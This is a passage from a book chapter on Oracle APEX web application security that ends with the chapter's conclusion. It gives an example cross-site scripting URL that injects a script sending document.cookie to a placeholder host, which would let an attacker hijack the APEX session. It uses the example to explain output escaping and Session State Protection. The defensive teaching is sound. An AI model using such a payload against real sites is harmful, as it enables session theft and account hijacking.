Databases Reference
In-Depth Information
Figure 8-24.
The Javascript alert showing all cookies
If the link were
…/f?p=4201995:2:1007199804302002::::P2 EMAIL:<script> window.location = 'http://someurl/' +•
document.cookie;</script>
the Javascript would post the contents of the cookie to
http://someurl
. The contents of that post would
be sufficient to allow a hacker to hijack the active APEX session.
By default, APEX escapes data on the way to the browser. As developers, though, we can override
this default behavior by selecting item types and report column types that do not escape data. We can
custom craft PL/SQL regions that do not escape data. Whenever we do this, we take on the burden of
ensuring that no unintended Javascript is sent to the browser.
The discussion above naturally leads to the topic of URL tampering. URL tampering is one of the
easiest ways for someone to see what mischief can be done in your application. APEX developers can
minimize URL tampering by enabling Session State Protection (SSP) on an application. Not all
applications will benefit from SSP, and it has some small drawbacks, but it should be considered for any
application in which URL tampering is a concern. Please see the APEX documentation for more
information on SSP.
Conclusion
For most, the Web is a wonderful, even magical place. Twenty years ago few would have imagined its
reach and ability to speed commerce, enlighten students, and even foment revolution. It is the
responsibility of developers to keep it that way, guarding our users from dangers they have yet to
imagine. Oracle Application Express is a powerful web application framework that provides a wealth of
features and security. Like any tool, though, it must be handled with care.
Wikileaks, Mastercard, and Visa were all victims of the architecture of web servers—which should
rapidly provide content to those who request it. Many bystanders were inconvenienced by the slowdown
of networks due to the vast amounts of traffic that can be generated by a small number of ever faster
home computers which are susceptible to hijacking. The nature of the Internet, which allows computers
to interact based upon open standards, carries with it the possibility of intrusion. Understanding the
basic principles of how the Internet works, how browsers and web servers communicate, and how this
communication can be exploited, is key to building robust, secure applications.
APEX provides a great platform to exploit what is best about the Internet and about Oracle—the ability
to rapidly share information. APEX has many more features than discussed in this chapter for doing so
securely. I have had the great pleasure of working with APEX developers, especially Scott Spadafore, on
these and many other topics. Thanks to them and to the APEX community.
